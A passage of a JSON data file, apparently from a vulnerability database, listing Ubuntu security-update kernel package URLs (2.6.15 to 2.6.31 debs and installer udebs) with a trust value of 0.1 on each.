        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
